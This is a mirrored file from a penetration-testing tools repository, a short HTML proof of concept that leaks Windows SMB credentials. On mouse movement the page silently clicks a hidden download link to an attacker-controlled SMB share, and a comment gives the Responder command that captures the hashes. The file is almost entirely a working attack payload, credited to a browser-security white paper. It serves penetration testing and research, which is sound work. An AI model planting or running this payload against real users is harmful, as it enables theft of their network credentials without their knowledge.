mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-21 18:11:37 +01:00
6 lines
315 B
HTML
6 lines
315 B
HTML
<!-- PoC for leaking SMB Credentials with listening Responder -->
|
|
<!-- as presented by X41 D-Sec GmbH in Browser Security White Paper. -->
|
|
<!-- To be used as: $ `responder -I eth0 -w -r f -v` -->
|
|
<body onmousemove="document.getElementById(6).click()">
|
|
<a id=6 href="\\192.168.56.101\edgeleak" download></a>
|
|
</body> |